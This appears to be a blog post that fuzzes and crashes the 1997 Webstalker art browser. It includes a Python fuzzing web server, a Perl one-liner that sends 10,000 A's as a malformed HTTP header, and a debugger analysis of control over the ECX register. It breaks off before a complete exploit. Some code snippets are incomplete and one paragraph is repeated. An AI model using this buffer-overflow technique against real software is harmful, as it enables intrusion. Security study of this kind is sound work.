y                                                           d//h      y                      y    o.    y        y             y     :/         y      `s                                    y  s`  :/                            
                                y                                                           y  y      y                      y    o.    s::::::::h             y     :/         y      `s                                    y  s`  :/                            
                                y  It must be admitted that the name of this piece          y  y      y                      y    o.             y             y     :/         y      `s                                    y  +/::+-                            
                                y  is not chosen very fortunately.                          y  y      y                      y::::s.             -/////////////:     :/         y      `s::::::::::::::::::::::::::::::::::::s                                    
                                y  But despite the double meaning,                          y  y      y                      `    `                                  :/  `::::::h:::::::`           :/                                                              
                                y  this is only about exploiting a program                  d//h      y   -::::::::::::::::::::::::::::::::::.         +::::::::::+. :/  :/````````````:+       .::::::::::.      `-::::-`                                        
                                y  and thereby                                              y  y      y   y`````````````````````````````````.s         y          // :/  :/            -+       y``````````y      o-````-o                                        
                                y  (it is important for me to emphasize that)               y  +::::::+   y                                 `s         y          :/ :/  :/            -+    ...h          y      o.    .o                                        
                                y  creating new art.                                        y             y  About I/O/D WEBSTALKER         `s         y          :/ :o--+/            -+   .s..h          y      :/::::/:                                        
                                y                                                           y./:::::/     y                                 `h-----.   y          :/  ```//            -+   .o  y..........y                                                      
                                y  The name just comes from a combination                   y:/`````y     y  The Webstalker                 `y`````y   y          :/     :+````````````:+   .o  ...y-....... .s::::::::o                                          
                                y  of the terms "Weird Machine"                             y//     y     y  was one of the first           `s     y   y          :/     `::::::::::::::.   .s.....y         -+        y                                          
                                y  and "Webstalker".                                        y-+:::::s     y  art browsers                   `s     y   y          :/                         -------         -+        y                                          
                                y                                                           y ``````      y  and is probably still          `s     y   y          :/           ----------------------------- -+        y                                          
                                o------------------------------------------------:::::::----o             y  the most famous.               `s     y   y          :/          `s...........................s`.o--------o                                          
                                 ````````````````````````````````````````````````y/////s-```              y                                 `y`````y   y----------+:          `s                           s` ``````````                                          
                                                                                 y     +-                 y  In May 2000 it was honored     `h------   ............`          `s                           s`                                                     
                                  back to landing page                           y.....o- .+/////////:    y  with the "Webby Award",        `s                                `s                           s`                                                     
                                                                                 -.....-  :/        .o    y  a kind of Internet Oscar,      `s     .....                      `s                           s` .....`                                              
                                                                                          :/        .o    y  in the category                `s    :+...+- o::::::::::::::::::::+:::::::::::::::::::o       s` y...//                                              
                                                                                          :/        .o    y  "Internet Art".                `s    //   /: y                                        y       s` y...//                                              
                                                                                          -+--------/+    y                                 `s    //```+: y  About weird machines:                 y       s` .----`                                              
                                                                                           ```-/::::``....y  https://bak.spc.org/iod/       `s    ./:::/` y                                        y       s`                                                     
                                                                                              +/...y :+---h                                 `s      ------h  It does feel weird to so              y       s`                                                     
                                                                                              +-   y /:   y                                 `s      y`````y  program with crafted data,            y       s`                                                     
                                                                                              //...y /:   y`````````````````````````````````.s      y     y  but then actual assembled             y       s`                                                     
                                                                                               ..... /:   ::::::s:::::::::::::::::::::////:::-      y`````y  binary code is nothing but            y       s`                                                     
                                                                                                     /:         y       -+:::+-       y::/+         ::::::h  data to the CPUs in it's              y       s`                                                     
                                                                                                     /:         y       /:   :/       y..:+  `````````    y  fetch-decode-execute cycle,           y```````s`                                                     
                                                                                                     /:         y       ./:::/.       ....` .s:::::::y`   y  snippets of silicon circuits          h:::::::/                                                      
                                            TABLE OF CONTENTS                                        /:         y                           -+       s`   y  responsible for performing            y   `````                                                      
                                                                                                     /:         y                           -+       s`   y  predictable actions when              y   y:::o:                                                     
                                            => 0x45 <+0>:  push  I/O/D                               ./::::::::::                           -+       s`   y  fed certain formatted inputs,         y   y   :/                                                     
                                                                                                                                            -o```````y`   y  then fetching more inputs.            y   y   :/                                                     
                                            => 0x46 <+1>:  mov   weird                                                                       -:::::::-    y  The exploit merely makes              y   +:::/.                                                     
                                                                                                                                                  /////-  y  a "processor" out of the              y                                                              
                                            => 0x49 <+4>:  sub   EXE                                                                              y   .o  y  borrowed target code snippets,        y                                                              
                                                                                                                                                  y...:o  y  which implement the                   y                                                              
                                            => 0x4d <+8>:  mov   REV                                                                              .....`  y  "weird instructions" just             y                                                              
                                                                                                                                             `/:::::::::::h  as digital logic implements           y                                                              
                                            => 0x50 <+11>: mov   DBG                                                                         .o           y  conventional ones.                    y                                                              
                                                                                                                                             .o           y                                        y                                                              
                                            => 0x54 <+15>: lea   FUZZ                                                                        .o           y  http://langsec.org/papers/Bratus.pdf  y                                                              
                                                                                                                                             .o           y........................................y                                                              
                                            => 0x5b <+22>: call  AAAA                                                                        .o           -:::::y::::::::::::::::::::::::::::::::::-                                                              
                                                                                                                                             .o                 y               -----------:                                                                      
                                            => 0x60 <+27>: mov   41414141                                                                    .o                 y               y``````````y                                                                      
                                                                                                                            -----------------:s-----------------y--.    -+//////o///+      y                                                                      
                                            => 0x64 <+31>: add   CPU EAX OMG RIP                                           `s......................................y    //          y      y                                                                      
                                                                                                                           .s                                      y    //          d//////o                                                                      
                                            => 0x68 <+35>: ret   ART                                                       .s  About Buffer Overflows:             y    //          y                                                                             
                                                                                                                           .s                                      y    //          y                                                                             
                                                                                                                           .s  Smashing the Stack for fun          y    ./:::::::::::                                                                             
                                                                                                                           .s  and profit                          y         .o///////+                                                                           
                                                                                                                           .s                                      y         -+      `y                                                                           
                                                                                                                           .s  Jon Erikson - Hacking               y         -+      `y                                                                           
                                                                                                                     .o////+s  The art of Exploitation             y         -+``````.s                                                                           
                                                                                                                     -+    .s                                      y   ``````.+//////:-                                                                           
                                                                                                                     -+    .s  LiveOverflow's Binary               y   s:::::::::::::o                                                                            
                                                                                                                     -+````.s  Exploitation Playlist               y   y             y                                                                            
                                                                                                                     `/::::/s                                      y   y             y                                                                            
                                                                                                                           .s                                      y   y             y                                                                            
                                                                                                                           .s                                      y   y`````````````y                                                                            
                                                                                                                           .s                                      y   ::::::::::::::-                                                                            
                                                                                                                           .s                                      y                                                                                              
                                                                                                                           .s                                      y                                                                                              
                                                                                                                           .s                                      y                                                                                              
                                                                                                                           .s                                      y                                                                                              
                                                                                                                           .s                                      y                                                                                              
                                                                                                          /::::::::::::+.   /::::::::::::::::::::::::::::::::::::::-                                                                                              
                                                                                                          y            +-
                                                                                                          y            +-
                                                                                                          y            +-
.//`+++++++++++++++++++++++++++++++++++++// s
-+/.h+..................................-os s
-+/.h/                                   ss s
-+/.h/                                   ss s
-+/.h/                                   ss s
-+/.h/                                   ss s
-+/.h/                                   ss s
-+/.h/                                   ss s
-+/.h/                                   ss s
-+/.h/                                   ss s
-+/.h/                                   ss s
-+/.h/                                   ss s
-+/.h/                                   ss s
-+/.h+                                   ss s
-+/                            :-.: +:oo-   s
  s                        .::::/osso::::. .+
`.y                        +yyyyhNNNmyyyy+ .+
 .o                    s s::::::::::::s.+ - +
-/y     .o             s ::::::::::::oss+::.+
`-y     .o             y            `+//:  .+

██╗    ██╗ ██████╗     ██╗██████╗ 
██║   ██╔╝██╔═══██╗   ██╔╝██╔══██╗
██║  ██╔╝ ██║   ██║  ██╔╝ ██║  ██║
██║ ██╔╝  ██║   ██║ ██╔╝  ██║  ██║
██║██╔╝   ╚██████╔╝██╔╝   ██████╔╝
╚═╝╚═╝     ╚═════╝ ╚═╝    ╚═════╝ 

For this experiment, the I/O/D Webstalker will be analyzed and hacked. The Webstalker was one of the first art browsers and is probably still the most famous. In May 2000 it was honored with the "Webby Award", a kind of Internet Oscar, in the category "Internet Art".
As with many media art projects, the programmers of Webstalker are concerned with making hidden structures visible.
While conventional browsers interpret the received code and usually display it as the programmer imagines it, the Webstalker offers a different view of surfing the World Wide Web.

The program provides mutiple functions for this purpose. For example, there is the crawler function, which searches an accessed web page for links to other pages. Then it follows the links to the new pages crawls links there, and so on.
Another function is the map, which graphically displays all the links found by the crawler as interconnected circles.
The third interesting function is called HTML stream. It displays the currently queried HTML sourcecode.

The Webstalker has been much praised or criticized for its simple monochrome design. The mouse can be used to drag white boxes on the black area. The functions are then assigned to these boxes. But most interesting is the view on the structures behind the surface. In this way, the Webstalker should illustrate this technical view in a novel way. It does not show the content of the web pages, but the technical and systemic aspects.

This is reminiscent of tools that are used today to analyze web applications. These "hacker tools" are mainly used in IT security and probably the best known for vulnerability hunting on the web is Burp Suite. Burp also has a crawler function and displays not the interfaces, but the source code of a page. The functions of Burp are technically much more sophisticated and it has a hardly comparable variety of functions, but with a bit of imagination, the Webstalker could be about a first sketch of an idea that was later expanded to tools like Burp.

> I/O/D Webstalker in action
██╗    ██╗███████╗██╗██████╗ ██████╗ 
██║    ██║██╔════╝██║██╔══██╗██╔══██╗
██║ █╗ ██║█████╗  ██║██████╔╝██║  ██║
██║███╗██║██╔══╝  ██║██╔══██╗██║  ██║
╚███╔███╔╝███████╗██║██║  ██║██████╔╝
 ╚══╝╚══╝ ╚══════╝╚═╝╚═╝  ╚═╝╚═════╝ 

Computers are weird. Everybody who works with computers knows this and the people who don't work with computers know it anyway...
But why is that?

On the one hand, computers consist of clear sequences and structures (as described here). On the other hand, they also need some kind of logic to make more or less meaningful calculations. If we combine this, we get a machine that can arbitrarily change its internal composites and structures.
That means computers can theoretically be anything we can imagine. And therefore also our worst nightmare. Full of crashes and errors.

The principle of changing internal states of a machine was already described decades ago by Alan Turing. Thus, a Turing machine is a logical machine whose states can be programmed. To change the function, the hardware does not have to be changed.
You don't have to open a smartphone and re-solder it in order to first scroll through the Internet and then make a phone call or take photos.
Instead, there is an operating system that can execute other programs.

But now we assume that programs work. Unfortunately, this is a fallacy. As soon as programs have to interact with the "real" world, they fail. Because the inner structures cannot deal with the infinite chaos of the universe.
Nobody can program a system, which intercepts all possibilities. For the simple reason that we ourselves almost always have no idea what is actually going on.

This means that if we manage to influence the machine in some way, there is a possibility to change the state and create something new.
A buffer overflow is a practical example of this very process. It can change bytes in the computers memory without paying attention to the ordering structures. Therefore a completely new space is created. This hack makes it possible to ignore and disregard any previous order and thus to draw completely arbitrary new boundaries. In turn this leads to a complete change of the entire programm or system.

A weird machine is born

The following demonstrates a buffer overflow in I/O/D Webstalker. Hacking Art is understood literally here and the artwork is actually hacked.
But beware! It will be very technical, even if I try to explain everything.

Anyway... Let's smash the stack for fun and art!

███████╗██╗  ██╗███████╗
█████╗   ╚███╔╝ █████╗  
██╔══╝   ██╔██╗ ██╔══╝  
███████╗██╔╝ ██╗███████╗
╚══════╝╚═╝  ╚═╝╚══════╝

In order to examine the Webstalker as the programm it is, a methodical approach can be taken. First, a comprehensive analysis of the functions and the internal structure is necessary. Afterwards it is attempted to provoke errors, which give indications of modification potential and possibilities. Finally, the logic of the program plus inserted characters, disregarding all previous systemic structures, leads to a change of the inner state. And thus to a change in the sense of an aesthetic, artistic experience.

To do this, we need to examine exactly how it works. What type of program we dealing with in the first place? The Webstalker comes as a compiled and executable binary file. This means: the program is present only in machine language. A compiled file is copied and executed directly into the computer's memory. In other words, it can be run with just one click (without needing another runtime or interpreting program). These files are called executables and have e.g. in Windows the file extension .exe.

File properties
> File properties in windows

On linux we can check the filetype with the file command in a bash terminal.

$ file IOD4.exe
IOD4.exe: PE32 executable (GUI) Intel 80386, for MS Windows

Executables are created by compiling the source code. This job is done by a compiler. A compiler is a translation program, which translates the source code into machine language. During this process program changes a lot. The original source code cannot be reconstructed from the machine language result. Which makes further analysis more difficult.

Source Code    |                                                 Binary Machine Code (displayed as text)
               |                      ___________
int main(){                          |           |               ELF▯▯▯          > ▯   @      @       9          @ 8              
    int i;                           | compiler  |               @         @       @       @       Ø▯      Ø▯                               
    int x = 1;                       |           |  ---------->  ÿ   H▯=Á   ÿ▯r/  ôH▯=™/  H▯’/  H9øt▯H‹N/  H…Àt	ÿà€    À    H▯=i/  
    for (i = 0; i < 10; i++){        |           |  ---------->  ‹Eø▯EüƒEø▯ƒ}ø	~ð¸    ]Ä     óúAWL▯=ƒ,  AVI‰ÖAUI‰õATA‰üUH▯-t,  SL)ýHƒìèoþÿ
      x=x+i;                         |           |  ---------->  f   D   ”   ˆðÿÿe    F▯IŽE ▯E(ŒD0†H8ƒG@n8A0A(B BBB
    }                                |           |                   Ø▯             ð=                           ø=                   
}                                    |           |                     }                     ▯                      À?              
                                                                          |                ·   ▯                                 

However, programs that are in machine language can be vulnerable to the buffer overflows mentioned earlier. We will discuss why this is the case in a second. What increases the probability for this kind of vulnerability in I/O/D Webstalker was the simple fact that in 1997 there was hardly any knowledge and thus no protection mechanisms against it.
Only a year earlier, the now very well-known article Smashing The Stack For Fun And Profit was published, which provided the first public guidance on these problems in programs.
Nowadays, there are protections against this type of vulnerability, both in the programming languages themselves and several protections that can be enabled in the operating system.

This work is also not about the latest exploit technique, but about a very classic stack-smashing buffer overflow.

But how can this machine code now be examined?

██████╗ ███████╗██╗   ██╗
██╔══██╗██╔════╝██║   ██║
██████╔╝█████╗  ██║   ██║
██╔══██╗██╔══╝  ╚██╗ ██╔╝
██║  ██║███████╗ ╚████╔╝ 
╚═╝  ╚═╝╚══════╝  ╚═══╝  

The problem of having only the machine code in its executable form remains. So where to look for the vulnerability?
In order to examine binary files there is still a possibility to reverse engineering and reconstructing some parts of the program functions. With the help of specialized tools one can try to reconstruct parts of the original source code. It is called disassembling and decompiling.

Decompiling means to backwards translate machine language into sourcecode. Unfortunately, decompiling does not always bring the desired results. The transformation of source code to machine language by compiling lets too much information get lost. Self-selected names of variables and functions, as well as comments in the code are helpful for programmers, but irrelevant for the computer. Decompiling therefore gives only a very rough approximation of what might once have been the original code.

Disassembling is a specific more "human readable" form of representing the machine language ones and zeros. This is done by translating the machine language (ones and zeros) back into human-readable words, so-called assembler code.

             _______   _____   ____________  ____     ___                                                                   
01100001011  )     (\_)    (\  )    __     (\)   |\  /  (\                                               
100110111   /              /\ /    (\_)    /\|   | |/   /\   Come to think of it,                                                                                           
00110110   /    /    /    / //            / /|   |_/   / /  the hexadecimal bytes really aren’t very useful themselves,                                                     
0101011   /    /    /    / //            / / |        / /  either that’s where assembly language comes in.                                                                 
011010    \\\\\/\\\/\\\\\\/ \\\\MOVE\\\\\\/  \\\\\\\\\\/  [...] Assembly language is really just a collection                                                                                                
11000100   __________                      ________      of mnemonics for the corresponding machine language instructions.                 
1101101    )        (\ _______   _____    )  __  (\     The instruction ret is far easier to remember                                                     
100011    \\\\\    /\ )     (\_)    (\  /  (\_)  /\    and make sense of than 0xc3 or 11000011.                                                                     
11001 ____   _/  _/ //              /\ /        / /   Unlike C and other compiled languages,                                                          
0110  \  (__/   /\\//    /    /    / //   /\\\\\\/   assembly language instructions have a direct                                         
0011   \_______/ / /    /    /    / //   / /        one-to-one relationship with their                                                 
01101   \\JUMP\\/  \\\\\/\\\/\\\\\\/ \\\\\/        corresponding machine language instructions.                                                  
111 ___________   __________   ____________       [...] Assembly is just a way for programmers                                               
01  )    __   (\  )         /\ )          (\     to represent the machine language instructions                            
0  /    (\_)  /\ /   \\\\\\\\//           /\    that are given to the processor.                                        
  /       ___/ //        /\   \\\\    /\\\\/   Exactly how these machine language instructions                             
 /    /\   \\\//   \\\\\\\/      /   / /      are represented is simply a matter of convention and preference.                
/    / \\    //          /\     /   / /                       
\\\\\\/  \\\\\\\RETURN\\\\/     \\\\\/      Jon Erickson    

The assembler code consists simplified only of memory addresses and commands to the CPU. With a function in a higher level language, for example one named "get_input", it would be clear at first sight that input of whatever kind is read or processed there. That would offer a good entry point for hacking and further analysis.
Here you can see the attempt of the reverse engineering tool Binary Ninja to translate compiled functions back into something like code. A certain structure is still roughly recognizable, for example at the if-else statements or the while loop, but otherwise the code looks like it was put through the shredder.

decompiled code
decompiled code

The variables visible here named edi, ecx, eax and so on stand for CPU registers with which the basic operations are executed. The corresponding assembly code is again one level more abstract. These four bytes \x89\xD8\xFF\xE0 form for example the following instructions:

mov eax, ebx
jmp eax

The first instruction mov (Move) moves a value from one CPU register, in this case EBX, into another, here EAX. If the value 0x123 is in EBX, the value 0x123 is now also in EAX. The second instruction jmp (Jump) makes the execution of the program jump to a new location. In this case the value in EAX is interpreted as an address and the execution of the program continues at 0x123.

In the next image, you can see part of the decompiled code from a moment ago. The graph view helps to track the jumps that the program would make during execution depending on the state by displaying arrows. The statement je, for example, stands for Jump Equal and jumps only if the previous test instruction returns the correct result. In a higher level programming language, this would probably be an if-else statement.

disassembled code in graph view
disassemblked code in graph view

Up to this point this should only give you a feeling for the fact that the CPU constantly loads values into its registers, compares them with each other and then executes jumps in the program flow. With a little practice, it is easier to read the code than to write it.
Unfortunately, with compiled programs often remains only to dig through the decompiled or disassembled code and hope from many small puzzle pieces on a larger whole. The larger a program is, the more complex the procedure and the less likely the success.

██████╗ ██████╗  ██████╗ 
██║  ██║██████╔╝██║  ███╗
██║  ██║██╔══██╗██║   ██║
╚═════╝ ╚═════╝  ╚═════╝

Another way to examine a binary file is to execute it and observe the behavior. For this purpose a debugger can be connected. This is a program that can hook into other processes on the system to read their memory states. With a debugger it is possible to stop the analyzed program at every single assembler instruction during runtime. This basically allows the machine code to be stepped through byte by byte and display the respective states. Transferred to movies, the instrument debugger would be a kind of remote control. With a remote control, a film can be dissected in a certain way. It can be stopped at any point, fast-forwarded and rewound. It can also be used to slow down the playback speed so that the film can be analyzed frame by frame.

Static analysis attempted to reconstruct and read the entire program using decompilation or disassembly. In dynamic analysis, the debugger can find the interesting parts of the code during runtime by simply calling them in the program.

I/O/D Webstalker in a debugger

Here you can see the attached debugger, which spits out many colorful numbers and characters that reveal information about the internal states of the system.

But also reading CPU states during runtime in the debugger is not really productive as long as nothing special happens. If the program only does what it is supposed to do, the debugger does not bring up much more results than the assembler code. Therefore the program must first be provoked to an unusual behavior, which is worth being examined more closely by means of the debugger. So it gets exciting when the program does something it should not do. For example crashing.

The Webstalker is an Art Browser, just like Riot/Shredder. This means that a web page is read in and processed here as well. In the Riot/Shredder, █ ███████ █████████ ██ ███ █████ ██ █ ███████ ████ ███ ██ ████████ ██ ███ █████████ (redacted). So maybe in this case unexpected structures could lead to problems inside the system.

This means all possible structures must be systematically changed to something unexpected and then read in to be processed by the I/O/D Webstalker until one of them causes a crash.

███████╗██╗   ██╗███████╗███████╗
██╔════╝██║   ██║╚══███╔╝╚══███╔╝
█████╗  ██║   ██║  ███╔╝   ███╔╝ 
██╔══╝  ██║   ██║ ███╔╝   ███╔╝  
██║     ╚██████╔╝███████╗███████╗
╚═╝      ╚═════╝ ╚══════╝╚══════╝

Fuzzing is a method of stressing an application with different input data. It attempts to send unexpected input to the application and find possible security problems by analyzing the response of the system.

A fuzzer is a program that generates new strings more or less randomly, which can then be used as input for the program to be tested. This generated input is intended to get the programm into trouble. Therefore, a fuzzer often generates very unusual looking texts obtained by permutations of an original sample.

|             |
|    Fuzzer   |
Ha\x0allll ll$llll\x00oooooo%%%ooo
|             |
|  Webstalker |
    can't handle input...
    ---> CRASH

By the way: some fuzzers output looks a bit like an email from the famous net.art duo Jodi. Maybe Dirk ran his text through a fuzzer before sending it...

hi Yannick*
    it was ggoood Ttatattata%TAlking to you - last week
    **fr grUSe \Diiiiii 

Ok, now let's write a small script that we can use to fuzz the webstalker.

The webstalker reads and processes web pages on the internet. This is our entry point. This means that the fuzzer must automatically generate "web pages" that are not "correct" and, for example, violate common conventions and protocols.

But a normal web server would probably also have its problems with serving "broken" web pages.
Therefore we have to program a very simple web server, which is at the same time a fuzzer and just delivers meaningless texts as web pages.
Since the HTTP protocol is also basically just text, we can fuzz it at the same time and send the web server as unpleasant data as possible one network level lower directly via the TCP protocol.

# first import radamsa fuzzing python library
import pyradamsa

# this is a basic HTTP structure
http = """
HTTP/1.0 200 OK
Date: Thu, 01 Jan 2021 13:37:00 GMT
Content-type: text/html
Content-Length: 100

# this is basic HTML code
html = f"""
<!DOCTYPE html>
        <meta />

# join the text together
fuzzdata = http + html

# initialize the fuzzer Radamsa
radams = pyradamsa.Radamsa()

# define a function that returns the fuzzing output
# this funciton is needed in a moment
def fuzz():
    return radams.fuzz(fuzzdata) #.encode())   

This is the fuzzing part, but now comes the webserver code. The code of the fuzzer is included as a library in the script of the web server. This allows to change the strings for the fuzzer dynamically without restarting the whole Python program. Only the library has to be reloaded.

# load the needed librarys
import socket
import threading
import importlib
# load the previous written fuzzing code as lib
import myfuzz

# prepare the socket to send data via TCP
bind_ip = ""
bind_port = 9000
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# this will open a port on the system and waits for a connection from webstalker

# if a client connects:
def handle_client(client_socket):
    # reload the fuzzing code in case it changed
    # generate a new (hopefully crashing) string
    crash = myfuzz.fuzz()
    # write string to a file for further analysis if it lead to a crash
    with open("crash.txt", "wb") as f:

    # receiving whatever the client talks
    request = client_socket.recv(1024)
    print(f"sending {len(crash)} bytes")
    # send data (pls crash) and close the connection

# some multi threaded client handling
while True:
    client,addr = server.accept()
    print(f"[*] Accepted connection from: {addr[0]}:{addr[1]}")
    client_handler = threading.Thread(target=handle_client,args=(client,))

This works quite well manually. But now there is a problem. One of the things that matters in fuzzing is the speed of the runs. The more potentially indigestible inputs are tested, the more likely the crash will occur. However, this cannot be easily implemented with Webstalker. So far, the process is as follows:

1. start Webstalker
2. generate a new web page with the fuzzer on the server side
3. click in the interface and enter the address of the web page
4. let the webstalker retrieve the newly generated web page
5. hope that it crashes
6. if it doesn't crash, go back to step 2 

This is a manual and tedious slow process.

Fortunately, the Webstalker itself comes to the rescue. The crawler function automatically calls up all the links on a page, one after the other. Therefore, only one web page is needed, which contains as many links as possible, and all of them redirect to the pages generated by the fuzzer. This way, the web crawler can go through the fuzzing input independently in an automated way.

crawler crawling

Fortunately, the Webstalker itself comes to the rescue. The crawler function automatically calls up all the links on a page, one after the other. Therefore, only one web page is needed, which contains as many links as possible, and all of them redirect to the pages generated by the fuzzer. This way, the web crawler can go through the fuzzing input independently in an automated way.

This means that a real webserver can be running, which outputs a single real page, but that contains as many links to the fake fuzzing webserver as possible. This can be realized by having the two listening on different ports.
This can be quickly done with a small shell command

# generate html page with 500 links
echo "<html><head></head><body>" > index.html
for i in `seq 1 500`; do
    echo '<a href="http://hacking.art:9000/test'$i'.html">link'$i'</a>' >> index.html;

# and start a simple webserver
python3 -m http.server 8000

Finally, everything comes together...

Since the webstalker is a browser and therefore was programmed to communicate with the Internet, it also needs an understanding of the underlying protocols making this communication possible. The HTTP protocol has certain headers at the beginning that provide the datas structure and inform communication partners of the respective status. The error code 404 - Not Found is such a status and thus part of the header of a web page.

The Webstalker must of course process these structures, or headers, correctly and has designated certain areas in memory for this purpose. It expects that a web server also follows the protocol. But if it does not, the Webstalker can no longer process the data correctly. It is incompatible with the expected structure and exceeds its intended limits.

 █████╗  █████╗  █████╗  █████╗ 
██║  ██║██║  ██║██║  ██║██║  ██║
╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝

When a browser requests an existing web page, the web server responds with a 200 OK. This means: "Yes, the page is here, now sending the data". 200 OK are exactly 7 characters (spaces are important too). So it would be logical if the program also creates space in memory for 7 characters in which it stores the received status code for further processing. In other words: there is space allocated in memory for the specific length that data requires according to the protocol. For this to work, however, it is a prerequisite that everyone complies with the protocol.

But what happens if the server does not answer with 200 OK, but with:


This leads to the fact that the read characters (e.g. ten thousand A's) are written into the memory, but blow up their intended space and overwrite completely different areas in the memory which lie behind it. If the program tries to access the data in these places, there are only the AAAA's left...
The program crashes.

comic to show the concept of memory corruption

To reproduce the crash, we can tell our simple python webserver to send this exact bytes every time a client connects. For this the payload can be generated and stored into a file or the file generated by the fuzzer can be used. And instead of creating a new page with the fuzzer we just change the python script to read in and send the data.

# shellcommand to generate a file with 10000 A's
$ perl -e 'print "HTTP/1.0 200 OK" . "A"x10000' > payload.bin
# modification in the webserver script:
def handle_client(client_socket):
    # read in the file "payload.bin"
    with open("payload.bin", "rb") as file:
        crash = file.read()

    request = client_socket.recv(1024)
    # send data from file

Up to this point, the search for a buffer overflow is still reasonably straightforward. But now the crash must be investigated. That means the exact states in the system's CPU and memory that lead to the crash. In order not to go insane it should be ensured that the crash behavior is reproducible, i.e. a certain input always leads to this crash.

██╗  ██╗ ██╗██╗  ██╗ ██╗██╗  ██╗ ██╗██╗  ██╗ ██╗
██║  ██║███║██║  ██║███║██║  ██║███║██║  ██║███║
╚════██║ ██║╚════██║ ██║╚════██║ ██║╚════██║ ██║
     ██║ ██║     ██║ ██║     ██║ ██║     ██║ ██║
     ╚═╝ ╚═╝     ╚═╝ ╚═╝     ╚═╝ ╚═╝     ╚═╝ ╚═╝

A buffer overflow occurs when bytes are written to a memory area where they do not belong. If the program tries to access this memory area in the further execution it leads to a crash, because the needed bytes were overwritten. The program runs into a segmentation fault. This error always occurs when a memory area is to be accessed that is not permitted or does not exist. In the next picture "41414141 Inaccessible Address" can be read. Here the program has tried to access the memory segment at address 0x41414141. However, this address does not exist. The number 41414141 is four times the letter A in hexadecimal representation (0x41). This is due to the ten thousand A's we sent to the webstalker in a not expected way.

crash in x32dbg debugger

We now can calculate which of the 10.000 A's exactly appear in that piece of memory that leads to the crash. Instead of just A's, you could send a non-repetitive pattern. If you send for example AAAABBBBCCCCDDDDEEEE and so on and in memory DDDD appears, you know the buffer is 12 Bytes long. The pattern and offset can be generated and figured out using known tools.

In this way the offset of the buffer overflow can be narrowed down to exactly 3706 bytes. The following bytes at the position 3707 to 3710 can be arranged in such a way that they make the buffer overflow usable.

The AAAA's became 414141, but it is also possible to write arbitrary bytes in there. That means, the memory of the program can be controlled from outside at this point.

But how does this finally lead to the change of the program?

exploit like it's 1999 stolen here

Since the program is old and in fact does not include any of today's protection mechanisms, it was possible to perform a classic buffer overflow. However, with some obstacles. Maybe it's not the best or nicest solution I found, but I found one and it works!!!

 ██████╗██████╗ ██╗   ██╗    
██╔════╝██╔══██╗██║   ██║    
██║     ██████╔╝██║   ██║    
██║     ██╔═══╝ ██║   ██║    
╚██████╗██║     ╚██████╔╝    
 ╚═════╝╚═╝      ╚═════╝     
███████╗ █████╗ ██╗  ██╗     
█████╗  ███████║ ╚███╔╝      
██╔══╝  ██╔══██║ ██╔██╗      
███████╗██║  ██║██╔╝ ██╗     
╚══════╝╚═╝  ╚═╝╚═╝  ╚═╝     
 ██████╗ ███╗   ███╗ ██████╗ 
██╔═══██╗████╗ ████║██╔════╝ 
██║   ██║██╔████╔██║██║  ███╗
██║   ██║██║╚██╔╝██║██║   ██║
╚██████╔╝██║ ╚═╝ ██║╚██████╔╝
 ╚═════╝ ╚═╝     ╚═╝ ╚═════╝ 
██████╗  ██╗ ██████╗           
██╔══██╗ ██║ ██╔══██╗          
██████╔╝ ██║ ██████╔╝          
██╔══██╗ ██║ ██╔═══╝           
██║  ██║ ██║ ██║               
╚═╝  ╚═╝ ╚═╝ ╚═╝               

WARNING: This is a very technical part!

A textbook buffer overflow would directly overwrite the CPU's EIP register (instruction pointer) return value stored on the stack and thus control the immediate next return-jump in the program. This would mean that bytes could simply be written to the register which would cause the program to jump to a location containing injected code, which then would be executed. Injected code can simply be placed in the buffer as well. At the moment, more then 3000 A's are still located there. So there is enough space for everything, especially for the code for the exploit.

classic buffer overflow exploit scheme

With Webstalker it is unfortunately not so simple. Here it is possible to overwrite the values in another register instead.

The overwritten register in this case is the ECX register. Now it depends on whether the ECX register is used in the further program flow and for what. The crash actually happens in Webstalker at the following unlikely place:

    mov eax, dword ptr ds:[ecx]    <--- CRASH

    call dword ptr ds:[eax]     <--- next instruction 

In the first instruction the crash happens because ECX is overwritten with 41414141 and cannot be retrieved. The instruction mov copies in this case the memory located at the address to which ECX points to EAX. The dword ptr means that it is understood as an address pointing to a location in memory. The next instruction makes a function call at the location pointed to by the address that is now in EAX. This means that whatever is at the address that EAX now points to will be called with the call instruction.

Example explanation of the principle. The exact numbers are unimportant

Again in more detail, because it becomes clear only after reading several times (and maybe my english is too bad):

  • ECX was overwritten but this instruction uses ECX to point to a place in memory.
    The overflow can therefore be used to influence which location in the memory is referenced.
  • These bytes that were referenced are copied into the EAX register
    (mov eax <-- bytes).
  • The call instruction thinks that the bytes now lying in EAX are again an address pointing to something.
  • So EAX points to a place in memory.
  • There again are other bytes.
    These bytes are interpreted as an address, which finally point to where the call instruction will jump to.
    The code execution continues at this place.

If it is possible to jump to our own code with the call instruction, the program flow can be hijacked.

The problem is that ECX is controlled, but until the call that would allow code to be executed, it is referenced twice to an address, each of which must contain an address again. To jump to a memory part where injected code could be placed, not only one address must be injected, but the content of two addresses must be controlled.

Unfortunately, another obstacle is the fact that the memory area where the read-in A's are located changes each time the program is executed (even with ASLR disabled). This memory changing behavior may be related to the webstalker internals itself.
In any case, it is not possible (for me at least) to predict where in memory the received bytes are located. This means that it is not possible to simply place addresses or jump there.

Further investigation shows: there is in fact another memory area that is controlled by the user and whose addresses do not change. Also some CPU-Registes already contain pretty usefull addresses that time the crash happens.

Back to Webstalkers functionality: The crawler function first loads the web page that is entered into the URL field and searches for links, which are then retrieved in order. The crash happens only after one of the links has been retrieved. However, the memory still contains the retrieved link and this time in a predictable memory location.

This means there is a small part in memory that can be written to, completely independent of the actual buffer overflow. This also means: more bytes could be placed there that would be useful down the road. The address pointing internally to this part of the memory was in my case 0012fb00.

Nevertheless only ECX can be controlled with the buffer overflow and ECX fetches the bytes from the place it points to in order to write them to EAX. Now when ECX is overwritten with 0012fb00, the bytes it points to are written to EAX, not the address itself. If ECX is considered to point to 0012fb00, which is the predictable and controlled memory area, one approach would be to simply place more addresses there, preparing the jump with call.

Unfortunately this is also not possible, because 0012fb00 with 00 at the beginning contains a zero byte, which leads the program to abort the whole input... 😭😭😭

At this point, it is helpful to make a cup of tea, to rethink some of your life choices and, above all, to once again become aware of the essentials.

 █████╗ ██████╗ ████████╗
███████║██████╔╝   ██║   
██╔══██║██╔══██╗   ██║   
██║  ██║██║  ██║   ██║   
╚═╝  ╚═╝╚═╝  ╚═╝   ╚═╝   
of exploit

